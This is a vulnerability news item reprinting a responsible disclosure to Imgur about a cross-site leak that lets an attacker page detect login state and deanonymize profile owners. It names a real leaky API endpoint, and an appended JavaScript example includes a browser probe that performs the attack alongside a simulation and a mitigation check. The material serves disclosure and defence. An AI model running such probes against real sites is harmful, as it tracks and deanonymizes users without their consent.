📚 Imgur: De-anonymization Attack: Cross Site Information Leakage
💡 News category: Vulnerabilities
🔗 Source: vulners.com
Dear Imgur Security Team,

We are researchers at the IMDEA Software Institute in Madrid, Spain. We have been working on analyzing Cross-Site Browser Leaks (xsleaks) and building a tool for finding instances of them on target web sites. Recently we tested imgur.com and discovered a flaw that can affect Imgur users. We would like to responsibly disclose it and support you in mitigating the issue. The details follow.

Attack Overview: Events-Fired xsLeak. A cross-domain attacker website, say attacker.org, could embed specific resources from imgur.com in a script tag and check whether an error or a load event is triggered in one state but not in the other. Based on which event fires for each vulnerable resource, the attacker can infer the victim's state (e.g. logged in vs. logged out, or owner of a specific profile). This happens because the leaky endpoint returns a 2xx HTTP response in one state but a 4xx in the other.

In particular, we have found 2 vulnerable (leaky) endpoints:

1. The first one can be used for login detection (onerror = logged out, onload = logged in): https://api.imgur.com/3/larynx/history?IMGURPLATFORM=web&IMGURUIDJAFO=9d77969d8b3a7a6ac6cb78943c96e48cd0bd74e02b29839f9f19aea827429db6&SESSIONCOUNT=3&client_id=546c25a59c58ad7

2. The second one can be used to track and deanonymize the owner of an Imgur profile across origins. For this, the attacker leverages the resource https://<username>.imgur.com/all, where <username> is the username of the victim to be fingerprinted...
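The following is an added example and is not code from the IMDEA report or from Imgur. It models the events-fired xsleak described above end to end: a stand-in for the leaky endpoint (2xx with a session cookie, 4xx without, mirroring what the report says about the history endpoint), the browser rule that a script element fires load for 2xx and error otherwise, the attacker's probe, and the inference from the observed event back to the victim's state. The hardenedEndpoint variant is an assumption of one possible mitigation (rejecting cross-site script requests via Fetch Metadata so both states answer identically), not the fix the report proposes or Imgur deployed; the session token and request headers are constructed for the simulation.

```javascript
// Added example (not from the IMDEA report or Imgur): an events-fired XS-Leak.
// The attacker page embeds a cross-site resource in a <script> tag and learns
// the victim's state from whether the element's load or error event fires,
// which depends only on the HTTP status class of the response.

// --- Victim side: hypothetical stand-in for the leaky endpoint.
// 2xx when a session cookie is present, 4xx otherwise, as the report
// describes for /3/larynx/history.
function leakyEndpoint(req) {
  return req.cookies.session ? 200 : 401;
}

// Hardened variant (assumption, not Imgur's actual fix): reject cross-site
// requests whose destination is "script" regardless of login state, so both
// states yield the same event. Browsers attach Fetch Metadata headers
// (Sec-Fetch-Site, Sec-Fetch-Dest, Sec-Fetch-Mode) to such requests;
// SameSite=Lax session cookies would be a second, independent layer.
function hardenedEndpoint(req) {
  const h = req.headers;
  if (h['sec-fetch-site'] === 'cross-site' && h['sec-fetch-dest'] === 'script') {
    return 403; // identical in every state: nothing to distinguish
  }
  return leakyEndpoint(req);
}

// --- Browser behaviour: a <script> element fires "load" for a 2xx response
// and "error" for 4xx/5xx or a network failure. Whether the body parses as
// JavaScript does not matter; a syntax error goes to window.onerror, not to
// the element's error event.
function scriptEventForStatus(status) {
  return status >= 200 && status < 300 ? 'load' : 'error';
}

// --- Attacker side: the real probe, to be run in a browser on attacker.org.
// Resolves with the event name. Not exercised by the offline simulation.
function probeWithScriptTag(url) {
  return new Promise((resolve) => {
    const s = document.createElement('script');
    s.onload = () => resolve('load');
    s.onerror = () => resolve('error');
    s.src = url; // cross-site request, sent with the victim's imgur.com cookies
    document.head.appendChild(s);
  });
}

// Map the observed event to a state via a per-endpoint oracle table:
// for the history endpoint load = logged in; for a profile endpoint
// load = the browser owns that profile (per the report).
function inferState(event, oracle) {
  return event === 'load' ? oracle.onload : oracle.onerror;
}

// Offline simulation of one probe against a given endpoint implementation.
// Request headers and session token are constructed for the example.
function simulate(endpoint, loggedIn) {
  const req = {
    cookies: loggedIn ? { session: 'constructed-session-token' } : {},
    headers: {
      'sec-fetch-site': 'cross-site',
      'sec-fetch-dest': 'script',
      'sec-fetch-mode': 'no-cors',
    },
  };
  const event = scriptEventForStatus(endpoint(req));
  return inferState(event, { onload: 'logged in', onerror: 'logged out' });
}

// Does this endpoint let a cross-site attacker tell the two states apart?
function leaks(endpoint) {
  return simulate(endpoint, true) !== simulate(endpoint, false);
}

// Usage: leaks(leakyEndpoint) is true, leaks(hardenedEndpoint) is false.
// In a browser, probeWithScriptTag('https://api.imgur.com/3/larynx/history?...')
// followed by inferState(...) performs the actual login-detection probe.
```

The check a defender wants is the one leaks() performs: for every state the endpoint can be in, the status class seen by a cross-site script request must be the same. Returning a uniform status for cross-site non-navigation requests, as the hypothetical hardenedEndpoint does, closes this specific channel, but a status that differs by state on any other embeddable resource reopens it, so the test should be run per endpoint rather than once.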